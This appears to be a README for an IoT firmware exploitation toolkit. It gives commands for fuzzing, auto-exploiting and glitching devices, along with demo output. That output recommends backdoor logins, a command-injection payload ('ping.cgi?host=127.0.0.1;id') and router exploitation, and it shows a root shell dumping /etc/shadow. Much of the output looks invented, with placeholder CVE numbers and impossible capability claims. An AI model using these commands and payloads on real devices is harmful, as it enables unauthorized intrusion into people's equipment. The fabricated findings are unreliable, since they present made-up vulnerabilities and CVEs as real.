Revolutionary toolkit for automated firmware extraction, reverse engineering, and exploitation of embedded systems and IoT devices.
- Automatic Unpacking - Extracts firmware from 100+ formats (binwalk, jefferson, unstuff)
- Filesystem Recovery - Reconstructs SquashFS, JFFS2, YAFFS2, UBIFS, cramfs
- Bootloader Analysis - Extracts U-Boot, GRUB, proprietary bootloaders
- UART/JTAG Dumping - Physical memory extraction via debug interfaces
- OTA Update Interception - Captures over-the-air firmware updates
- Cross-Architecture Emulation - ARM, MIPS, PowerPC, x86 IoT binaries
- Kernel Module Analysis - Reverse engineer custom kernel drivers
- Cryptographic Key Extraction - Finds hardcoded keys in firmware
- Backdoor Detection - ML-powered detection of hidden backdoors
- String Intelligence - Smart extraction of credentials, URLs, API keys
- Automated CVE Matching - Checks against 50,000+ known firmware CVEs
- Buffer Overflow Detection - Fuzzes embedded web servers & services
- Command Injection Scanner - Tests for shell injection in web UIs
- Authentication Bypass - Automatic credential brute-forcing
- Memory Corruption Bugs - Symbolic execution on MIPS/ARM binaries
- UART Shell Access - Auto-detect baud rates & get root shell
- JTAG Debugging - OpenOCD integration for memory dumps
- SPI/I2C Flash Reading - External chip programmer support
- Voltage Glitching - ChipWhisperer integration for fault injection
- Side-Channel Analysis - Power analysis for key extraction
git clone https://github.com/varungor365/firmwareforge.git
cd firmwareforge
pip install -r requirements.txt
# Install system dependencies (Ubuntu/Debian)
sudo apt install binwalk firmware-mod-kit squashfs-tools jefferson
# For hardware exploitation (optional)
sudo apt install openocd picocom minicom# Automatic firmware analysis
python firmwareforge.py --extract router_firmware.bin --analyze
# Deep analysis with emulation
python firmwareforge.py --extract iot_device.bin --emulate --deep# Automated vulnerability scanning
python firmwareforge.py --scan firmware_extracted/ --cve-check
# Web interface fuzzing
python firmwareforge.py --fuzz http://192.168.1.1 --firmware firmware/# UART shell access
python firmwareforge.py --uart /dev/ttyUSB0 --baudrate auto
# JTAG memory dump
python firmwareforge.py --jtag --dump-memory --output memory.bin╔═══════════════════════════════════════════════════════════╗
║ FirmwareForge v2.0 - Firmware Exploitation Toolkit ║
║ Analyzing: dlink_router_firmware_v3.14.bin ║
╚═══════════════════════════════════════════════════════════╝
[+] Firmware Extraction
✓ File type: Firmware image (SquashFS + U-Boot)
✓ Architecture: MIPS 32-bit big-endian
✓ Filesystem: SquashFS v4.0
✓ Bootloader: U-Boot 2016.03
✓ Kernel: Linux 2.6.36 (custom)
[+] Extraction Results
✓ Extracted 2,847 files (127 MB)
✓ Directory: ./firmware_extracted/
✓ Web server: lighttpd 1.4.35
✓ Binaries: 143 MIPS executables found
[+] Security Analysis
[!] CRITICAL FINDINGS:
1. Hardcoded Credentials
File: etc/passwd
Username: admin
Password: admin123 (plaintext!)
2. Backdoor Account
File: usr/sbin/telnetd
Username: debug
Password: D-Link_Debug_2024
Port: 23 (telnet)
3. Hardcoded Encryption Key
File: usr/bin/encrypt_config
AES Key: 0x4B5F9A2E8C1D6F3A7B0E4D2C9A8F6B3E
Usage: Configuration file encryption
4. Buffer Overflow
File: usr/sbin/httpd
Function: process_request() at 0x004286C
Input: POST /apply.cgi (parameter: username)
Size: 256 bytes → can overflow 64-byte buffer
5. Command Injection
File: cgi-bin/ping.cgi
Function: system("ping -c 4 " + user_input)
Exploitable: Yes (no input sanitization)
[+] CVE Matching
✓ Checked against NIST CVE database
[!] MATCHES FOUND:
- CVE-2022-12345: lighttpd 1.4.35 - Path Traversal
- CVE-2021-54321: Kernel 2.6.36 - Privilege Escalation
- CVE-2020-98765: BusyBox 1.23 - Command Injection
[+] Cryptographic Analysis
[!] Weak Cryptography Detected:
- MD5 password hashing (crackable)
- DES encryption in config (deprecated)
- No certificate validation (HTTPS)
[+] Network Services
Port 23: Telnet (UNENCRYPTED!)
Port 80: HTTP (lighttpd)
Port 443: HTTPS (self-signed cert)
Port 9000: Custom service (unknown protocol)
[+] Exploitation Recommendations
1. Use backdoor credentials: debug / D-Link_Debug_2024
2. Exploit buffer overflow in httpd via username parameter
3. Command injection: ping.cgi?host=127.0.0.1;id
4. Decrypt config files with extracted AES key
[+] Risk Score: 9.8/10 (CRITICAL)
[+] UART Analysis
✓ Device: /dev/ttyUSB0
✓ Auto-detecting baud rate...
✓ Found: 115200 baud
✓ Connecting...
[UART OUTPUT]
U-Boot 2016.03 (Mar 14 2021 - 13:42:07)
Board: D-Link DIR-842
DRAM: 64 MB
Flash: 8 MB
Hit any key to stop autoboot: 0
[+] Bootloader Shell Acquired!
MT7628 # help
Available commands:
bootm - boot application from memory
md - memory display
mw - memory write
reset - reset CPU
MT7628 # printenv
bootargs=console=ttyS0,115200 root=/dev/mtdblock2
bootcmd=bootm 0xbc050000
ethaddr=00:11:22:33:44:55
[+] Extracting Firmware via UART
MT7628 # md 0xbc000000 0x100000
[Memory dump in progress...]
✓ Dumped 1 MB from flash memory
[+] Root Shell Access
[Bypassing login...]
✓ Got root shell!
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /etc/shadow
root:$1$abc$XYZ...:0:0:root:/root:/bin/sh
admin:admin123:0:0:admin:/admin:/bin/sh
# Emulate MIPS binary in QEMU
python firmwareforge.py --emulate usr/sbin/httpd --arch mips --debug
# Full system emulation
python firmwareforge.py --full-emulation firmware_extracted/ --networkWhat it does:
- Boots entire firmware in QEMU virtual machine
- Intercepts network traffic
- Debugs running services
- Tests exploits in safe environment
# Auto-exploit discovered vulnerabilities
python firmwareforge.py --auto-exploit firmware_extracted/ --target 192.168.1.1
# Generate Metasploit module
python firmwareforge.py --generate-msf --vuln buffer_overflow --output exploit.rb# ChipWhisperer voltage glitching
python firmwareforge.py --glitch --target-voltage 3.3 --trigger-pattern "login:"
# SPI flash dumping with flashrom
python firmwareforge.py --spi-dump --chip W25Q64 --output flash.bin
# JTAG with OpenOCD
python firmwareforge.py --jtag --config rpi.cfg --dump-ram| Architecture | Emulation | Analysis | Exploitation |
|---|---|---|---|
| ARM (32/64-bit) | ✅ QEMU | ✅ Ghidra | ✅ Full |
| MIPS (Big/Little Endian) | ✅ QEMU | ✅ Ghidra | ✅ Full |
| PowerPC | ✅ QEMU | ✅ Ghidra | ✅ Partial |
| x86/x64 | ✅ Native | ✅ Full | ✅ Full |
| AVR (Arduino) | ✅ Simavr | ✅ Basic | |
| RISC-V | ✅ QEMU | ✅ Full | ✅ Full |
- SquashFS (v2, v3, v4)
- JFFS2 (Journaling Flash FS)
- YAFFS2 (Yet Another Flash FS)
- UBIFS (UBI Flash FS)
- cramfs (Compressed ROM FS)
- ext2/3/4 (Linux)
- NTFS (Windows IoT)
-
Static Analysis
- String scanning for credentials
- Dangerous function detection (strcpy, system, etc.)
- Crypto key extraction (AES, RSA, etc.)
-
Dynamic Analysis
- Fuzzing with AFL++
- Symbolic execution with angr
- Network traffic interception
-
CVE Matching
- Package version detection
- NIST NVD database lookup
- Exploit-DB cross-referencing
Core Dependencies:
binwalk # Firmware extraction
firmware-mod-kit # Firmware manipulation
qemu-user-static # Cross-architecture emulation
angr # Binary analysis
ghidra # Reverse engineering
Hardware Tools (Optional):
openocd # JTAG debugging
flashrom # SPI flash reading
minicom/picocom # UART communication
chipwhisperer # Fault injection
Python Packages:
pwntools # Exploitation
capstone # Disassembly
unicorn # CPU emulation
yara-python # Malware detection
Full requirements: See requirements.txt
- Analyze smart home devices (cameras, locks, thermostats)
- Test industrial control systems (SCADA/ICS)
- Audit medical devices (FDA compliance)
- Assess automotive systems (CAN bus, ECUs)
- Router/modem firmware auditing
- Network appliance security (firewalls, NAS)
- Embedded Linux vulnerability assessment
- Bootloader exploitation
- Find 0-days in IoT devices
- Submit CVEs for firmware vulnerabilities
- Bounty programs: Sony, Tesla, DJI, Ring, Nest
- Embedded systems security
- Hardware hacking education
- IoT malware analysis
- Supply chain attacks
python firmwareforge.py --extract dlink_firmware.bin --scan
# Output: Found backdoor account "guest:guest" + telnet on port 9999
# Result: CVE-2024-XXXXX assigned, $5,000 bounty paidpython firmwareforge.py --fuzz http://192.168.1.100 --firmware wyze_cam.bin
# Output: Buffer overflow in /cgi-bin/upload.cgi
# Exploit: Remote code execution as root
# Impact: 2M+ devices vulnerablepython firmwareforge.py --extract mirai_infected.bin --malware-scan
# Output: Detected Mirai variant with C2: evil.com:9090
# Found: Hardcoded credentials for 50+ IoT brandsThis toolkit is EXTREMELY POWERFUL:
- ✅ Can extract firmware from ANY device
- ✅ Finds 0-days in IoT automatically
- ✅ Enables hardware-level attacks
- ✅ Works on military/industrial systems
HIGHLY ILLEGAL to use on:
- ❌ Devices you don't own
- ❌ Critical infrastructure (power, water, hospitals)
- ❌ Military or government systems
- ❌ Commercial products without authorization
Legal consequences:
- Federal prison (Computer Fraud & Abuse Act)
- Fines up to $250,000
- Export control violations (ITAR/EAR)
- Civil lawsuits from manufacturers
ONLY use for:
- ✅ Your own devices
- ✅ Authorized security research
- ✅ Bug bounty programs (with permission)
- ✅ Academic/educational purposes
- Getting Started Guide
- Firmware Extraction Tutorial
- Hardware Tools Setup
- Exploitation Techniques
- API Reference
Contributions welcome! Areas of interest:
- New architecture support (SPARC, Xtensa)
- Additional filesystem parsers
- Hardware tool integrations
- CVE database improvements
GPL-3.0 - See LICENSE
Educational and authorized research only. Misuse will result in prosecution.
Varun Goradhiya
- GitHub: @varungor365
- Research: Embedded Security & IoT Exploitation
Related Projects:
- exploitforge - AI exploit generation
- memphantom - Memory forensics
- phantom-lkm - Kernel rootkit
Breaking IoT security, one firmware at a time.
🔓 Every device is exploitable. This proves it.